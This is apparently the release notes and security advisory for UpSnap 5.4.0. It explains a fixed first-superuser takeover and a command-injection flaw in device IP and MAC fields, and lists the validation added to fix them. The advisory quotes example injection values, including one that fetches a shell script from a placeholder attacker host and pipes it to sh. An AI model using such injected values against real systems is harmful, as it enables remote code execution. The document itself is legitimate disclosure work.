Note
UpSnap is, and always will be, free and open source software.
If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.
The official and only trusted source for UpSnap is this repository (and its linked releases).
Do not pay third parties for something that is provided here for free.
New Setup Process
What changed
The initial setup process has been changed. Instead of a built-in multi-step wizard, UpSnap now directs you to create your first superuser account via the server console logs, which contain a one-time setup link generated by PocketBase.
Once you've created the superuser using that link, return to the UpSnap welcome page and click Done to continue.
Why this was necessary
In versions prior to 5.4.0, the setup wizard allowed anyone with network access to register the first superuser account if they reached the setup page before the legitimate administrator. This meant that on a publicly reachable instance, an attacker could take ownership of the application before the real admin had a chance to complete the setup.
By moving account creation out-of-band to the server console, only someone with access to the server logs (i.e. the administrator) can complete the initial setup.
Note
If you have sucessfully completed the initial setup in the past you are not affected.
RCE via Device IP and MAC Address Injection
What was the issue
UpSnap allows setting custom shell commands for waking and shutting down devices. These commands support {{ DEVICE_IP }} and {{ DEVICE_MAC }} placeholders, which are replaced with the device's actual IP and MAC values before being executed on the server.
In versions prior to 5.4.0, these values were only changed by removing spaces before being substituted into the shell command. An attacker with permission to edit a device could set a malicious IP or MAC field, for example:
IP: 127.0.0.1;curl${IFS}http://attacker.com/shell.sh|sh
MAC: 00:00:00:00:00:00&&id
When the device was woken or shut down, the injected commands would execute on the server with the same privileges as UpSnap itself.
What was fixed
-
Backend: Before substituting
{{ DEVICE_IP }}and{{ DEVICE_MAC }}into any shell command, UpSnap additionally validates both values using Go's standardnet.ParseIPandnet.ParseMAC. If a value somehow reaches this point in an invalid state, the command is rejected and an error is returned instead of executing. -
Database: A new migration adds regex constraints to the ip and mac fields in the PocketBase schema (
^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}$for IP,^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$for MAC). Any write that bypasses the UI is rejected at the database level. -
HTML input: The IP and MAC fields in the device form now have pattern attributes that enforce valid formats directly in the browser, preventing malformed values from being submitted in the first place.
Who is affected
Any instance where untrusted users had permission to create or edit devices. Users who are the sole administrator of their own instance and have not shared device-edit access are at lower risk.
Changelog
Bug fixes
- 74633e7: fix: use token based superuser setup (@seriousm4x)
- 43f3f65: fix: validate ip and mac addresses to prevent RCE (@seriousm4x)
Others
- dfaf0ee: build(deps-dev): bump @sveltejs/kit from 2.59.1 to 2.60.1 in /frontend (@dependabot[bot])
- 8b08585: build(deps-dev): bump svelte from 5.55.5 to 5.55.7 in /frontend (@dependabot[bot])
- 92f9e29: update deps (@seriousm4x)